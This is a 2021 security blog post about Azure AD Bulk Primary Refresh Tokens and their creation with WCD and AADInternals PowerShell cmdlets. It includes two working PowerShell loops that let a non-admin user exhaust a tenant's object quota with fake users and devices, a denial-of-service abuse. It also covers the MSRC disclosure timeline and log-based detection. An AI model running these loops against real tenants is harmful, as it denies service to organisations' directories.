<!DOCTYPE html>
<html lang="en-gb">
<head>
<meta charset="UTF-8">
<meta http-equiv="cache-control" content="no-cache"> 
<meta http-equiv="expires" content="0"> 
<meta http-equiv="pragma" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>BPRT unleashed: Joining multiple devices to Azure AD and Intune</title>
<meta name="description" content="The site for Microsoft 365 and Azure AD administrators">
<meta name="generator" content="Hugo 0.39" />
<meta property="og:title" content="BPRT unleashed: Joining multiple devices to Azure AD and Intune" />
<meta property="og:description" content="In October 2020, someone contacted me and asked whether it would be possible
to create BPRTs using AADInternals. I hadn&rsquo;t even heard of BPRTs, but was eventually able to help him to create BPRTs. Now this
functionality is included in AADInternals v0.4.5.

In this blog, I&rsquo;ll explain what BPRTs are and how they can be used to join multiple devices to both Azure AD and Intune.
I&rsquo;ll also show the dark side of BPRTs: how they can be used to conduct DOS attacks against Azure AD, and how to detect and prevent this.

" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://o365blog.com/post/bprt/" />



<meta property="article:published_time" content="2021-01-31T00:00:00&#43;00:00"/>

<meta property="article:modified_time" content="2022-09-26T00:00:00&#43;00:00"/>











<link rel="dns-prefetch" href="//fonts.googleapis.com" />
<link rel="dns-prefetch" href="//fonts.gstatic.com" />

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:400,400italic,700" type="text/css" media="all" />
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css" rel="stylesheet">
<link rel="stylesheet" href="/css/style.css" type="text/css" media="all" />
<script type="text/javascript" src="/js/scripts.js"></script>
<script type="text/javascript" src="/js/tools.js"></script>

<link rel="apple-touch-icon-precomposed" sizes="57x57" href="/images/apple-touch-icon-57x57.png" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="/images/apple-touch-icon-114x114.png" />
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="/images/apple-touch-icon-72x72.png" />
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="/images/apple-touch-icon-144x144.png" />
<link rel="apple-touch-icon-precomposed" sizes="60x60" href="/images/apple-touch-icon-60x60.png" />
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="/images/apple-touch-icon-120x120.png" />
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="/images/apple-touch-icon-76x76.png" />
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="/images/apple-touch-icon-152x152.png" />
<link rel="icon" type="image/png" href="/images/favicon-196x196.png" sizes="196x196" />
<link rel="icon" type="image/png" href="/images/favicon-96x96.png" sizes="96x96" />
<link rel="icon" type="image/png" href="/images/favicon-32x32.png" sizes="32x32" />
<link rel="icon" type="image/png" href="/images/favicon-16x16.png" sizes="16x16" />
<link rel="icon" type="image/png" href="/images/favicon-128.png" sizes="128x128" />
<meta name="application-name" content="&nbsp;"/>
<meta name="msapplication-TileColor" content="#FFFFFF" />
<meta name="msapplication-TileImage" content="/images/mstile-144x144.png" />
<meta name="msapplication-square70x70logo" content="/images/mstile-70x70.png" />
<meta name="msapplication-square150x150logo" content="/images/mstile-150x150.png" />
<meta name="msapplication-wide310x150logo" content="/images/mstile-310x150.png" />
<meta name="msapplication-square310x310logo" content="/images/mstile-310x310.png" />


<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-61454000-4', 'auto');
ga('send', 'pageview');
</script>
<script async src='//www.google-analytics.com/analytics.js'></script>

</head>
<body class="body body-right-sidebar mobile" itemscope="itemscope" itemtype="http://schema.org/WebPage">
	<div class="container container-outer">
		<header class="header" itemscope="itemscope" itemtype="http://schema.org/WPHeader">
		
			<div class="container container-inner clearfix">
			
				<div class="logo" role="banner" itemscope="itemscope" itemtype="http://schema.org/Brand">
				
					<a class="logo__link" href="/" title="Office 365 blog" rel="home">
						<img src="/images/favicon-96x96.png"><h1 class="logo__title">Office 365 blog</h1>
						<h2 class="logo__tagline">Everything about Microsoft 365 security</h2>
					</a>
				</div>
			</div>
			
<nav class="menu" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
	<ul class="menu__list">
		<li class="menu__item "><a class="menu__link" href="/aadkillchain/">AAD &amp; M365 KILL CHAIN</a></li>
		<li class="menu__item "><a class="menu__link" href="/aadinternals/">AAD INTERNALS</a></li>
		<li class="menu__item "><a class="menu__link" href="/links/">LINKS</a></li>
		<li class="menu__item "><a class="menu__link" href="/powershell/">POWERSHELL</a></li>
		<li class="menu__item "><a class="menu__link" href="/talks/">TALKS</a></li>
		<li class="menu__item "><a class="menu__link" href="/tools/">TOOLS</a></li>
	</ul>
</nav>

		</header>
		<div class="wrapper clearfix">

<main class="main-content content" role="main" itemprop="mainContentOfPage">
	<article class="post">
		<header class="post__header clearfix">
			<h1 class="post__title">BPRT unleashed: Joining multiple devices to Azure AD and Intune</h1>
			<p class="post__meta meta">
				<svg class="icon icon-time" height="14" viewBox="0 0 16 16" width="14" xmlns="http://www.w3.org/2000/svg"><path d="m8-.0000003c-4.4 0-8 3.6-8 8 0 4.4000003 3.6 8.0000003 8 8.0000003 4.4 0 8-3.6 8-8.0000003 0-4.4-3.6-8-8-8zm0 14.4000003c-3.52 0-6.4-2.88-6.4-6.4000003 0-3.52 2.88-6.4 6.4-6.4 3.52 0 6.4 2.88 6.4 6.4 0 3.5200003-2.88 6.4000003-6.4 6.4000003zm.4-10.4000003h-1.2v4.8l4.16 2.5600003.64-1.04-3.6-2.1600003z"/></svg>
				<time class="post__meta-date" datetime="2021-01-31T00:00:00">January 31, 2021</time>
					<time class="post__meta-lastmod" datetime="2022-09-26T00:00:00"> (Last Modified: September 26, 2022)</time>
				<span class="post__meta-categories meta-categories">
					<svg class="icon icon-category" height="16" viewBox="0 0 16 16" width="16" xmlns="http://www.w3.org/2000/svg"><path d="m7 2l1 2h8v11h-16v-13z"/></svg>
					<a class="meta-categories__link" href="/categories/blog" rel="category">blog</a></span>
			</p>
			<div class="post__tags tags clearfix">
<ul class="tags__list">
	<li class="tags__item"><a class="tags__link" href="http://twitter.com/intent/tweet?url=http%3a%2f%2fo365blog.com%2fpost%2fbprt%2f&text=BPRT%20unleashed%3a%20Joining%20multiple%20devices%20to%20Azure%20AD%20and%20Intune&tw_p=tweetbutton" title="Share in Twitter" target="_blank" rel="nofollow"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
	<li class="tags__item"><a class="tags__link" href="https://www.linkedin.com/shareArticle?url=http%3a%2f%2fo365blog.com%2fpost%2fbprt%2f&mini=true&title=BPRT%20unleashed%3a%20Joining%20multiple%20devices%20to%20Azure%20AD%20and%20Intune&summary=&source=o365blog.com" title="Share in LinkedIn" target="_blank" rel="nofollow"><i class="fa fa-linkedin" aria-hidden="true"></i></a></li>
</ul>
</div>
		</header>
		<div class="post__content clearfix">
			<figure class="post__thumbnail">
				<img src="/images/posts/bprt.png" alt="BPRT unleashed: Joining multiple devices to Azure AD and Intune">
			</figure>
				<nav id="TableOfContents">
<ul>
<li><a href="#what-is-bprt">What is BPRT</a></li>
<li><a href="#how-to-create-bprt-token">How to create BPRT token?</a>
<ul>
<li><a href="#windows-configuration-designer-wcd">Windows Configuration Designer (WCD)</a></li>
<li><a href="#aadinternals">AADInternals</a></li>
</ul></li>
<li><a href="#how-to-use-bprt-token">How to use BPRT token?</a></li>
<li><a href="#how-to-abuse-azure-ad-with-bprts">How to abuse Azure AD with BPRTs</a>
<ul>
<li><a href="#fill-azure-ad-with-users">Fill Azure AD with users</a></li>
<li><a href="#fill-azure-ad-with-devices">Fill Azure AD with devices</a></li>
</ul></li>
<li><a href="#microsoft-response">Microsoft response</a></li>
<li><a href="#detecting">Detecting</a>
<ul>
<li><a href="#windows-configuration-designer-consent">Windows Configuration Designer consent</a></li>
<li><a href="#device-registration-service-access-token">Device Registration Service access token</a></li>
<li><a href="#creating-bprts">Creating BPRTs</a></li>
<li><a href="#using-bprt-to-get-access-tokens">Using BPRT to get access tokens</a></li>
<li><a href="#enrolling-devices-to-azure-ad">Enrolling devices to Azure AD</a></li>
<li><a href="#enrolling-devices-to-intune">Enrolling devices to Intune</a></li>
</ul></li>
<li><a href="#preventing">Preventing</a></li>
<li><a href="#summary">Summary</a></li>
<li><a href="#references">References</a></li>
</ul>
</nav>
			<p>In October 2020, someone contacted me and asked whether it would be possible
to create BPRTs using AADInternals. I hadn&rsquo;t even heard of BPRTs, but was eventually able to help him to create BPRTs. Now this
functionality is included in <strong><a href="/aadinternals/" target="_blank">AADInternals</a> v0.4.5</strong>.</p>

<p>In this blog, I&rsquo;ll explain what BPRTs are and how they can be used to join multiple devices to both Azure AD and Intune.
I&rsquo;ll also show the dark side of BPRTs: how they can be used to conduct DOS attacks against Azure AD, and how to detect and prevent this.</p>

<p></p>

<h1 id="what-is-bprt">What is BPRT</h1>

<p>BPRT token is a Bulk Primary Refresh Token, sometimes also called &ldquo;Bulk AAD Token&rdquo;, which is used to enroll multiple devices to Azure AD and Microsoft Endpoint Manager (Intune).</p>

<p>According to Microsoft&rsquo;s bulk device enrollment <a href="https://docs.microsoft.com/en-us/mem/intune/enrollment/windows-bulk-enroll" target="_blank">documentation</a>:</p>

<blockquote>
<p><strong>As an administrator</strong>, you can join large numbers of new Windows devices to Azure Active Directory and Intune. To bulk enroll devices for your Azure AD tenant, you create a provisioning package with the Windows Configuration Designer (WCD) app.</p>
</blockquote>

<p>This implies that in order to create BPRTs, one should be an administrator. However, the documentation also states the following (added after my report in January 2021):</p>

<blockquote>
<p>Creating a provisioning package <strong>does not require any administrator roles</strong> in your Azure AD tenant.</p>
</blockquote>

<h1 id="how-to-create-bprt-token">How to create BPRT token?</h1>

<h2 id="windows-configuration-designer-wcd">Windows Configuration Designer (WCD)</h2>

<p>Lets see how the BPRT is created with an official Microsoft tool, Windows Configuration Designer (WCD), which can be installed from <a href="https://www.microsoft.com/p/windows-configuration-designer/9nblggh4tx22" target="_blank">Microsoft Store</a>.</p>

<p>First, create a new provisioning package:</p>

<p><img src="/images/posts/bprt_1.png" alt="Create a new provisioning package" /></p>

<p>Second, go to <strong>Account management</strong>, select <strong>Enroll in Azure AD</strong> and click <strong>Get Bulk Token</strong>:</p>

<p><img src="/images/posts/bprt_2.png" alt="Get Bulk Token" /></p>

<p>After clicking the button, user is prompted for credentials. If the WCD is not used earlier, an app consent is presented:</p>

<p><img src="/images/posts/bprt_3.png" alt="app consent" /></p>

<p>The status line is shown after the BPRT is fetched. I also noticed that the default user name for an extra local admin account is &ldquo;ScottLock&rdquo; 🤔</p>

<p>To see the token, click <strong>Switch to advanced editor</strong></p>

<p><img src="/images/posts/bprt_4.png" alt="status" /></p>

<p>Expand <strong>Runtime settings</strong> &gt; <strong>Accounts</strong> &gt; <strong>Azure</strong> and click <strong>BPRT</strong>. The token can now be copied (or replaced with the one created with AADInternals).</p>

<p><img src="/images/posts/bprt_5.png" alt="BPRT" /></p>

<p>Now the created provisioning package can be used to join devices automatically to Azure AD.</p>

<h2 id="aadinternals">AADInternals</h2>

<p>Now that we know how to create BPRT token &ldquo;properly&rdquo;, next step is to learn what happens on the background.</p>

<p>The first step is the authentication and authorisation. The access token was fetched using the client id of Windows Configuration Designer and had the following content (only relevant information shown):</p>

<pre><code>aud   : urn:ms-drs:enterpriseregistration.windows.net
appid : de0853a1-ab20-47bd-990b-71ad5077ac7b
scp   : self_service_device_delete
</code></pre>

<p>After testing, I was able to confirm that the registration was not bound to WCD client id. This means that other client ids, such as AAD Graph, could be used as long as the resource (audience) is correct.
The audience refers to Device Registration Service (DRS).</p>

<p>Next, a http post was made to:</p>

<pre><code>https://login.microsoftonline.com/webapp/bulkaadjtoken/begin
</code></pre>

<p>The sent payload was the following:</p>

<div class="highlight"><pre class="chroma"><code class="language-json" data-lang="json"><span class="p">{</span>
    <span class="nt">&#34;pid&#34;</span><span class="p">:</span> <span class="s2">&#34;6d762967-8f0f-40cb-8031-1726eb261259&#34;</span><span class="p">,</span>
    <span class="nt">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;package_6d762967-8f0f-40cb-8031-1726eb261259&#34;</span><span class="p">,</span>
    <span class="nt">&#34;exp&#34;</span><span class="p">:</span> <span class="s2">&#34;03/1/2021&#34;</span>
<span class="p">}</span></code></pre></div>

<p>The used parameters are as follows:</p>

<table>
<thead>
<tr>
<th>Parameter</th>
<th>Explanation</th>
</tr>
</thead>

<tbody>
<tr>
<td>pid</td>
<td>Package identifier. A random GUID of the package. The resulting user will have an upn in the form &ldquo;package_&lt;pid&gt;@&lt;default domain&gt;&rdquo;</td>
</tr>

<tr>
<td>name</td>
<td>The display name of the resulting user. Can be any string.</td>
</tr>

<tr>
<td>exp</td>
<td>Date of expiration. Must be less than 180 days from the current date.</td>
</tr>
</tbody>
</table>

<p>As a response, a flow token (redacted) and status were returned:</p>

<div class="highlight"><pre class="chroma"><code class="language-json" data-lang="json"><span class="p">{</span>
    <span class="nt">&#34;flowToken&#34;</span><span class="p">:</span> <span class="s2">&#34;AQABAAEAAAD..&#34;</span><span class="p">,</span>
    <span class="nt">&#34;state&#34;</span><span class="p">:</span> <span class="s2">&#34;Started&#34;</span><span class="p">,</span>
    <span class="nt">&#34;resultData&#34;</span><span class="p">:</span> <span class="kc">null</span>
<span class="p">}</span></code></pre></div>

<p>After this, a http get request was made using the flowToken from the response as a query parameter:</p>

<pre><code>https://login.microsoftonline.com/webapp/bulkaadjtoken/poll?flowToken=AQABAAEAAAD..
</code></pre>

<p>As a response, the BPRT was returned in resultData:
<div class="highlight"><pre class="chroma"><code class="language-json" data-lang="json"><span class="p">{</span>
    <span class="nt">&#34;flowToken&#34;</span><span class="p">:</span> <span class="kc">null</span><span class="p">,</span>
    <span class="nt">&#34;state&#34;</span><span class="p">:</span> <span class="s2">&#34;CompleteSuccess&#34;</span><span class="p">,</span>
    <span class="nt">&#34;resultData&#34;</span><span class="p">:</span> <span class="s2">&#34;{\&#34;token_type\&#34;:\&#34;Bearer\&#34;, ...}&#34;</span>
<span class="p">}</span></code></pre></div></p>

<p>The resultData contains id token and refresh token for the resulting user. The refresh token is the actual BPRT:
<div class="highlight"><pre class="chroma"><code class="language-json" data-lang="json"><span class="p">{</span>
    <span class="nt">&#34;token_type&#34;</span><span class="p">:</span> <span class="s2">&#34;Bearer&#34;</span><span class="p">,</span>
    <span class="nt">&#34;expires_in&#34;</span><span class="p">:</span> <span class="s2">&#34;2393336&#34;</span><span class="p">,</span>
    <span class="nt">&#34;ext_expires_in&#34;</span><span class="p">:</span> <span class="s2">&#34;0&#34;</span><span class="p">,</span>
    <span class="nt">&#34;expires_on&#34;</span><span class="p">:</span> <span class="s2">&#34;1614556799&#34;</span><span class="p">,</span>
    <span class="nt">&#34;refresh_token&#34;</span><span class="p">:</span> <span class="s2">&#34;0.AAAAxkwDR.AgABAAAAAAD...&#34;</span><span class="p">,</span>
    <span class="nt">&#34;refresh_token_expires_in&#34;</span><span class="p">:</span> <span class="mi">2393336</span><span class="p">,</span>
    <span class="nt">&#34;id_token&#34;</span><span class="p">:</span> <span class="s2">&#34;eyJ0e...&#34;</span>
<span class="p">}</span></code></pre></div></p>

<p>Now what is this &ldquo;resulting user&rdquo; mentioned above you may think. Well, as it turns out, creating a BPRT <strong>creates a user object to Azure AD</strong>!
The upn of the user will always be &ldquo;package_&lt;pid&gt;@&lt;default domain&gt;&rdquo; but the display name can be freely selected.</p>

<p><strong>AADInternals</strong> have had a function for creating the BPRT since v0.4.5:</p>

<p><div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get the access token</span>
<span class="nb">Get-AADIntAccessTokenForAADGraph</span> <span class="n">-Resource</span> <span class="n">urn</span><span class="err">:</span><span class="n">ms-drs</span><span class="err">:</span><span class="n">enterpriseregistration</span><span class="p">.</span><span class="n">windows</span><span class="p">.</span><span class="n">net</span> <span class="n">-SaveToCache</span>

<span class="c"># Create a new BPRT</span>
<span class="nv">$bprt</span> <span class="p">=</span> <span class="nb">New-AADIntBulkPRTToken</span> <span class="n">-Name</span> <span class="s2">&#34;My BPRT user&#34;</span></code></pre></div>
<strong>Output:</strong></p>

<pre><code>BPRT saved to package_8eb8b873-2b6a-4d55-bd96-27b0abadec6a-BPRT.json
</code></pre>

<p><strong>Note!</strong> If you got an error &ldquo;AADSTS240001: User is not authorized to register devices in Azure AD.&ldquo;, there can be two reasons for this.
First is that the user does not have rights to register devices. Another reason is, that WCD app has not been given consent.
The admin consent can be given using the following link: https://<a href="https://login.microsoftonline.com/common/adminConsent?client_id=de0853a1-ab20-47bd-990b-71ad5077ac7b&redirect_uri=https://portal.azure.com/TokenAuthorize" target="_blank">login.microsoftonline.com/common/adminConsent?client_id=de0853a1-ab20-47bd-990b-71ad5077ac7b&amp;redirect_uri=<a href="https://portal.azure.com/TokenAuthorize">https://portal.azure.com/TokenAuthorize</a></a>
and the user consent with: https://<a href="https://login.microsoftonline.com/common/oauth2/authorize?client_id=de0853a1-ab20-47bd-990b-71ad5077ac7b&response_type=code" target="_blank">login.microsoftonline.com/common/oauth2/authorize?client_id=de0853a1-ab20-47bd-990b-71ad5077ac7b&amp;response_type=code</a>.
After the admin consent is given, the browser may stay &ldquo;loading&rdquo; the page due to redirect url the app is using - this is ok and can be ignored.</p>

<p><strong>Note!</strong> For the new tenants the consent for WCD app is required. For older tenants, this seems not to be case. Moreover, removing the app/consent does not remove the functionality 😥
Apparently, giving the consent to WCD app does something irreversible to the tenant.</p>

<h1 id="how-to-use-bprt-token">How to use BPRT token?</h1>

<p>Now that we know that we can create BPRTs, the obvious question is what can we do with them? The first usage scenario is to create BPRTs programmatically, allowing automatisation of creating provisioning packages.</p>

<p>Another scenario is to enroll devices to Azure AD and Intune like the Windows devices would after the provisioning package is applied.</p>

<p>So what happens when the device is enrolling to Azure AD and Intune with BPRT?</p>

<p>First, the device will get an access token for Azure AD Join using the BPRT. Luckily, this is just
a normal flow where a new access token is fetched using BPRT as a refresh token. The only limitation seems to be that
with BPRT, access tokens are only provided for Azure AD Join and Intune MDM client ids.</p>

<p>With AADInternals, the BPRT can used to get access token for AAD Join:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get the access token for AAD Join using BPRT</span>
<span class="nb">Get-AADIntAccessTokenForAADJoin</span> <span class="n">-BPRT</span> <span class="nv">$BPRT</span> <span class="n">-SaveToCache</span></code></pre></div>

<p>And now we have a working access token and we can join devices to Azure AD and create PRTs as explained in my earlier <a href="/post/prt/#creating-your-own-prt" target="_blank">blog post</a>:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Join the device to Azure AD</span>
<span class="nb">Join-AADIntDeviceToAzureAD</span> <span class="n">-DeviceName</span> <span class="s2">&#34;My computer&#34;</span></code></pre></div>

<pre><code>Device successfully registered to Azure AD:
  DisplayName:     &quot;My computer&quot;
  DeviceId:        d03994c9-24f8-41ba-a156-1805998d6dc7
  Cert thumbprint: 78CC77315A100089CF794EE49670552485DE3689
  Cert file name : &quot;d03994c9-24f8-41ba-a156-1805998d6dc7.pfx&quot;
Local SID:
  S-1-5-32-544
Additional SIDs:
  S-1-12-1-797902961-1250002609-2090226073-616445738
  S-1-12-1-3408697635-1121971140-3092833713-2344201430
  S-1-12-1-2007802275-1256657308-2098244751-2635987013
</code></pre>

<p>Similarly, we can get an access token for Intune with BPRT and Azure AD device certificate:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get the access token for Intune using BPRT and Azure AD device certificate</span>
<span class="nb">Get-AADIntAccessTokenForIntuneMDM</span> <span class="n">-BPRT</span> <span class="nv">$BPRT</span> <span class="n">-PfxFileName</span> <span class="p">.\</span><span class="n">d03994c9</span><span class="p">-</span><span class="n">24f8</span><span class="p">-</span><span class="n">41ba-a156</span><span class="p">-</span><span class="n">1805998d6dc7</span><span class="p">.</span><span class="n">pfx</span> <span class="n">-SaveToCache</span></code></pre></div>

<p>And finally, we can enroll the device to Intune:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Enroll the device to Intune</span>
<span class="nb">Join-AADIntDeviceToIntune</span> <span class="n">-DeviceName</span> <span class="s2">&#34;My computer&#34;</span></code></pre></div>

<pre><code>Intune client certificate successfully created:
  Subject:         &quot;CN=5ede6e7a-7b77-41bd-bfe0-ef29ca70a3fb&quot;
  Issuer:          &quot;CN=Microsoft Intune MDM Device CA&quot;
  Cert thumbprint: A1D407FF66EF05D153B67129B8541058A1C395B1
  Cert file name:  &quot;d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx&quot;
  CA file name :   &quot;d03994c9-24f8-41ba-a156-1805998d6dc7-MDM-CA.der&quot;
  IntMedCA file :  &quot;d03994c9-24f8-41ba-a156-1805998d6dc7-MDM-INTMED-CA.der&quot;
</code></pre>

<h1 id="how-to-abuse-azure-ad-with-bprts">How to abuse Azure AD with BPRTs</h1>

<p>As always, the biggest question in this blog is how we can abuse Azure AD with the things we have learned? So far, I&rsquo;ve found two scenarios.</p>

<h2 id="fill-azure-ad-with-users">Fill Azure AD with users</h2>

<p>As we&rsquo;ve learned, creating a BPRT creates also a user object to Azure AD. We&rsquo;ve also learned that creating a BPRT does not require any admin rights.
As per Microsoft <a href="https://docs.microsoft.com/en-us/azure/active-directory/enterprise-users/directory-service-limits-restrictions" target="_blank">documentation</a>, a non-admin user can create no more than 250 objects to Azure AD.
However, this limit does NOT apply for BPRTs ☹</p>

<p>As such, in practice, this means that a <strong>normal user can create user objects until the Azure AD quota limit is reached!</strong> 🤦‍</p>

<p>To demonstrate this, I used the following simple script to fill Azure AD with BPRTs:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get the access token</span>
<span class="nb">Get-AADIntAccessTokenForAADGraph</span> <span class="n">-Resource</span> <span class="n">urn</span><span class="err">:</span><span class="n">ms-drs</span><span class="err">:</span><span class="n">enterpriseregistration</span><span class="p">.</span><span class="n">windows</span><span class="p">.</span><span class="n">net</span> <span class="n">-SaveToCache</span>

<span class="c"># Create objects until quota reached</span>
<span class="k">for</span><span class="p">(</span><span class="nv">$a</span> <span class="p">=</span> <span class="n">1</span> <span class="p">;</span> <span class="nv">$a</span> <span class="o">-lt</span> <span class="n">50000</span> <span class="p">;</span> <span class="nv">$a</span><span class="p">++)</span>
<span class="p">{</span>
    <span class="nv">$name</span> <span class="p">=</span> <span class="s1">&#39;BPRT-{0:d5}&#39;</span> <span class="o">-f</span> <span class="nv">$a</span>
    <span class="k">try</span><span class="p">{</span>
        <span class="nb">New-AADIntBulkPRTToken</span> <span class="n">-Name</span> <span class="nv">$name</span> <span class="p">|</span> <span class="nb">Out-Null</span>
    <span class="p">}</span> <span class="k">catch</span><span class="p">{}</span>
<span class="p">}</span></code></pre></div>

<p>The throughput is only 23 users per minute, so I eventually used multiple PowerShell sessions to speed things up.</p>

<p>The following animation shows that after the quota is reached, no new users can be added:</p>

<p><img src="/images/posts/BPRT_DOS.gif" alt="BPRT DOS" /></p>

<h2 id="fill-azure-ad-with-devices">Fill Azure AD with devices</h2>

<p>As we&rsquo;ve learned, the BPRT can be used join devices to Azure AD and Intune. As the BPRT represents a user, it would be
fair to assume that the same limitations apply to those users as well. Especially, when the WCD mentiones that the default limit is 20:</p>

<p><img src="/images/posts/bprt_6.png" alt="WCD limit" /></p>

<p>In my test tenant, I had a 50 device limit per user:</p>

<p><img src="/images/posts/bprt_7.png" alt="device settings" /></p>

<p>Guess what? Yep, that device limit does not apply for &ldquo;BPRT users&rdquo; ☹</p>

<p>Again, in practice, this means that a <strong>normal user can create device objects until the Azure AD quota limit is reached!</strong> 🤦‍</p>

<p>To demonstrate this, I used the following simple script to fill Azure AD with devices:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get the access token</span>
<span class="nb">Get-AADIntAccessTokenForAADJoin</span> <span class="n">-BPRT</span> <span class="nv">$bprt</span> <span class="n">-SaveToCache</span>

<span class="c"># Create devices until quota reached</span>
<span class="k">for</span><span class="p">(</span><span class="nv">$a</span> <span class="p">=</span> <span class="n">1</span> <span class="p">;</span> <span class="nv">$a</span> <span class="o">-lt</span> <span class="n">50000</span> <span class="p">;</span> <span class="nv">$a</span><span class="p">++)</span>
<span class="p">{</span>
    <span class="nv">$name</span> <span class="p">=</span> <span class="s1">&#39;DEV-{0:d5}&#39;</span> <span class="o">-f</span> <span class="nv">$a</span>
    <span class="k">try</span><span class="p">{</span>
        <span class="nb">Join-AADIntDeviceToAzureAD</span> <span class="n">-DeviceName</span> <span class="nv">$name</span>
    <span class="p">}</span> <span class="k">catch</span><span class="p">{}</span>
<span class="p">}</span></code></pre></div>

<p>The throughput was a bit higher, about 90 users per minute, but I still used multiple PowerShell sessions to speed things up.</p>

<p>The following animation shows that after the quota is reached, no new users can be added:</p>

<p><img src="/images/posts/Device_DOS.gif" alt="Device DOS" /></p>

<h1 id="microsoft-response">Microsoft response</h1>

<p>Naturally, all this made feel very uncomfortable as a normal non-admin user can make a Denial of Service (DOS) attack against their own tenant. This, naturally, had to be reported to Microsoft.</p>

<p>My initial report was following:</p>

<blockquote>
<p>According <a href="https://docs.microsoft.com/en-us/mem/intune/enrollment/windows-bulk-enroll">https://docs.microsoft.com/en-us/mem/intune/enrollment/windows-bulk-enroll</a> an admin can create a bulk AAD token (BPRT), which can be used to enroll multiple devices to Azure AD and Intune. <br><br>
I noticed, that a regular user without any admin rights can also create a BPRT. As such, they can add devices without number restrictions (if joining to AAD is allowed). <br><br>
As I&rsquo;m planning to publish a blog post and toolkit regarding to this, I&rsquo;d like to know is this expected behavior?</p>
</blockquote>

<p>Here is the full timeline of my correspondence with Microsoft on January 2021:</p>

<table>
<thead>
<tr>
<th>Date</th>
<th>Description</th>
</tr>
</thead>

<tbody>
<tr>
<td>13th</td>
<td>Initial report</td>
</tr>

<tr>
<td>13th</td>
<td><strong>Response</strong>: &ldquo;In order to investigate your report I will need a valid proof of concept (POC) ideally with images or video..&rdquo;</td>
</tr>

<tr>
<td>16th</td>
<td>Created a ten minute <a href="https://youtu.be/aaqEZ-yJNFA" target="_blank">POC video</a> and resubmitted the report</td>
</tr>

<tr>
<td>16th</td>
<td><strong>Response</strong>: &ldquo;In order to investigate your report I will need a valid proof of concept (POC) ideally with images or video..&rdquo;.</td>
</tr>

<tr>
<td>17th</td>
<td>Send an email explaining I&rsquo;ve done all I&rsquo;ve could and assume that MSRC does not regard this a vulnerability and will publish my findings.</td>
</tr>

<tr>
<td>20th</td>
<td><strong>Response</strong>: &ldquo;In order to investigate your report I will need detailed steps to reproduce your reported issue consistently, ideally with attached images or video.&rdquo; <br> &ldquo;If you believe this to be a misunderstanding of the report, submit a new report.&rdquo;</td>
</tr>

<tr>
<td>20th</td>
<td>Created another <a href="https://youtu.be/lGjVcVCRI6M" target="_blank">POC video</a> and resubmitted the report again</td>
</tr>

<tr>
<td>20th</td>
<td><strong>Response</strong>: &ldquo;Thank you for contacting the Microsoft Security Response Center (MSRC). I&rsquo;ve opened a case for this issue&rdquo;</td>
</tr>

<tr>
<td>27th</td>
<td><strong>Response</strong>: &ldquo;Upon investigation, we have determined that <strong>this submission is by design and does not meet the definition of a security vulnerability for servicing</strong>. This report does not appear to identify a weakness in a Microsoft product or service that would enable an attacker to compromise the integrity, availability, or confidentiality of a Microsoft offering.&rdquo;</td>
</tr>
</tbody>
</table>

<p>Reporting findings to MSRC was (again) a very frustrating experience. For instance, the POC video was first viewed after my THIRD post: the first video had 10 views and the second one 4 views on Jan 20th, but no
views between 20th and 27th. However, AFTER receiving the anticipated &ldquo;by design&rdquo; response from MSRC, they have viewed the videos an extra 20 times.</p>

<p>It is also interesting that the documentation was changed after my report, but the page seems to be edited in November 2020, not January 2021 🤔. The original page
can be seen in the beginning of the first POC.</p>

<p><strong>Sep 26 2022:</strong> As this is an old blog post, I wanted to add that <strong>my experience with MSRC has improved greatly</strong> since this blog post.
This is a good reminder though that it is not always easy to report to vendors about something that is clearly wrong.
Having said that, as of today, <strong>this issue has still not been fixed</strong>.</p>

<h1 id="detecting">Detecting</h1>

<h2 id="windows-configuration-designer-consent">Windows Configuration Designer consent</h2>

<p>First sign for BPRT abuse is consentint the WCD app. <strong>Note:</strong> This can also be a normal behaviour!</p>

<p>When the consent is given for the WCD app, an entry is created in <strong>Audit log</strong>. We are interested in the activity type &ldquo;Consent to application&rdquo;
where the target is &ldquo;Windows Configuration Designer (WCD)&rdquo;:</p>

<p><img src="/images/posts/bprt_15.png" alt="hunt8" /></p>

<h2 id="device-registration-service-access-token">Device Registration Service access token</h2>

<p>Second sign for BPRT abuse is getting the access token for Device Registration Service (DSR). The resource id of DSR is:</p>

<pre><code>01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9
</code></pre>

<p>In the &ldquo;normal&rdquo; process the WCD application id is used:</p>

<pre><code>de0853a1-ab20-47bd-990b-71ad5077ac7b
</code></pre>

<p>So, if the DSR access token is not fetched using WCD client id, it is likely a sign of abusive behavior. For instance AADInternals is currently using
Azure Active Directory PowerShell client id. The following screen shot from <strong>Sign-ins log</strong> shows an entry generated when access token is fetched using AADInternals (can be interactive or non-interactive):</p>

<p><img src="/images/posts/bprt_8.png" alt="hunt1" /></p>

<h2 id="creating-bprts">Creating BPRTs</h2>

<p>Third sign for BPRT abuse is the actual creation of BPRTs. This can be detected from the <strong>Audit log</strong>. Below is an example of an Audit log entry where the user created a BPRT.</p>

<p>In the Activity tab, we can see that the corresponding user is created by &ldquo;Microsoft.Azure.SyncFabric&rdquo; Service Principal, not the user.</p>

